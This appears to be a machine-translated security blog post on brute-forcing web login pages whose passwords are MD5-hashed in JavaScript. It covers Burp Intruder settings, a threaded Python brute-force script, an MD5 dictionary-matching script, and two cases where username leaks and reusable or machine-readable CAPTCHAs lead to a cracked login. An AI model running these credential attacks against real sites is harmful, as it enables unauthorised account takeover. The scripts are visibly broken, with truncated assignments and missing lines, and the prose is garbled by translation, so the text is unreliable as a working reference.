analysis of web violence guessing

Posted by fierce at 2020-02-26

0x01 Preface

The web login interface is the channel for the website foreground to enter the background. For the login management interface, common web attacks such as SQL injection, XSS, weak password, brute force guessing, etc. This paper mainly makes a simple analysis of the idea of Web brute force guessing, and expounds it with an example of vulnerability.

0x02 thinking

In the web login interface, there are three main elements: user name, password, and verification code. The simplest idea is as follows:

1. Get the user name, including login error prompt, website article editing and signing, social workers, etc

2. Password guessing, an effective dictionary

3. Verification code identification or bypassing, often including separation of verification code and user name password, failure of automatic refreshing of verification code, reusable verification code identification

According to the way HTTP transmits data, it can be roughly divided into two types:

Type 1: plaintext transmission

This is the most popular web application that does not have a verification code or fail to log in. Only the user name and password can log in and directly load the dictionary for blasting. The most common is to use the burp suite Intruder performs violent guessing, and intruder supports a variety of blasting modes: single dictionary blasting, multi field same dictionary blasting, multi dictionary position corresponding blasting, aggregate blasting.

Type 2: front end JS encryption processing

Now, many web applications will use js to encrypt the password during the login process, and then in the sending server, the password obtained by using the proxy tool is the encrypted password, which to a certain extent adds some trouble to our blasting. The following is an analysis of JS encryption blasting.

0x03 JS encrypted blasting

Common JS encryption methods include MD5, Base64 and shal. Here, a simple demo is written as a test.


<meta charset="utf-8">  
<script type="text/ecmascript" src="md5.js"></script>
function checkInput() {
   var password_input = document.getElementById('password');
   var password_md5 = document.getElementById('password_md5');
   password_md5.value =hex_md5(password_input.value);
   return true;

<form action="login.php" method="post" onsubmit="return checkInput()">
   用户:<input type="text" id="username" name="username"> <br/>
   密码:<input type="password" id="password"> <br/>
   <input type="hidden" id="password_md5" name="password">
   <input type="submit" value="提交" />

Submit the form and grab the package. You can find that the password in the password field is encrypted:

The common JS MD5 encryption can be processed in two ways: one is to use intruder to support multiple encryption and encoding, and to encrypt the password field; the other is to write Python script. Those familiar with the encryption algorithm can rewrite or directly use the JS file of the website to encrypt the password field.

3.1 Burp Suite Intruder

1. Grab packets and send them to the intruder, mark relevant parameters, and select the fourth mode "cluster bomb"

2. Select the user name dictionary and password dictionary respectively. When setting the password dictionary, select MD5 encryption mode to encrypt the password field

3. Start blasting, judge whether it is successful according to the length of the returned field, and obtain the MD5 value of the user name and password field successfully. Admin: 21232f297a57a5a743894a0e4a801fc3

4. MD5 decrypts successfully and obtains the user name and password admin / Admin

3.2 PyExecJS

Here, Python execjs is used to execute the JS statement and simulate the front end to encrypt the account password

Get ready:

pip install PyExecJS

Phantomjs Download:

Write Python script to explode:

import requests
import threadpool
from selenium import webdriver
import execjs
def getpass(str):
   with open ('md5.js','r') as js:
       source =
       phantom = execjs.get('PhantomJS')
       getpass = phantom.compile(source)
       password ='hex_md5',str)
       return password
def login(user,passwd):
   payload ={'username':user,'password':getpass(passwd)}
   headers={'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0'}
       response =,data=payload,headers=headers,timeout=5)
       if result.count('fail')<1:
           print '[success] ' +url+":"+user+':'+passwd
def getLines(fileName):
   with open(fileName, 'r') as fd:
       for line in fd.readlines():
           line = line.strip()
           if not len(line) or line.startswith('#'):
   return list
if __name__ == '__main__':    
   userlist = [([user,passwd],None) for user in username_list for passwd in password_list]    
   pool = threadpool.ThreadPool(20)  
   reqs = threadpool.makeRequests(login,userlist)  
   [pool.putRequest(req) for req in reqs]  

User account password successfully exploded

0x04 vulnerability instance

Here are two examples of loopholes. In actual combat, according to different loopholes, we can flexibly use violence aesthetics, which is simple and extremely destructive.

Vulnerability example 1: unauthorized access to user name + password JS encryption + reuse of verification code

Vulnerability scenario: the homepage of the website contains a login module, including user name, password, and verification code. Normal data is input for testing. It is found that the password is transmitted with JS encryption, and the verification code cannot be refreshed automatically and can be reused.

1. Scan the sensitive files of the website and find that the system has unauthorized access. Through the URL, you can directly access the system background log management module and obtain the user login name.

2. Through the unauthorized user name, load the password dictionary, code the dictionary password, brutally crack it, and successfully blast out the MD5 value corresponding to the password of user TB: 6846860684f05029abccc09a53cd66f1

3. MD5 cracking, the corresponding value of MD5 is: a111111

Tips: sometimes when MD5 cannot be decrypted, what should I do? We know that this MD5 value corresponds to one of our password dictionaries. You can write Python scripts to compare MD5 values.

!/usr/bin/env python
-- coding: utf-8 --
import hashlib  
def get_line():
   f = open('1.txt')
   print 'start:'
   while True:
       line = f.readline().strip()
       if len(line)==0:
           print 'line 0'
       m1 = hashlib.md5()
       tmp =m1.hexdigest()
       print line+"  :"+tmp
       if tmp==src:
           print src+u': md5对应的值为:'+line

Test screenshot:

5. Through the obtained users and the cracked users, successfully log in the system.

Vulnerability scenario 2: login error prompt + verification code recognizable

1. Enter the user name admin, password, and verification code. You will be prompted that the user name you entered does not exist. Please re-enter it.

2. Using pkav http fuzzer 1.2's verification code identification engine, the verification code can be automatically identified

3. According to the login error prompt, the user name dictionary is loaded for blasting. When the prompt "the password you entered is incorrect, please re-enter", at this time, we get the user name of sysadmin, further load the password dictionary for blasting, and blasting the user password.

People who like this article also like it······

A kind of [code audit] getshell caused by easysns UU v1.6 remote image localization

A kind of [code audit] SQL secondary code injection vulnerability example (with tamper script)


About Me

A network security enthusiast has a paranoid pursuit of technology. Committed to sharing original high-quality dry goods, including but not limited to: penetration testing, WAF bypass, code audit, security operation and maintenance.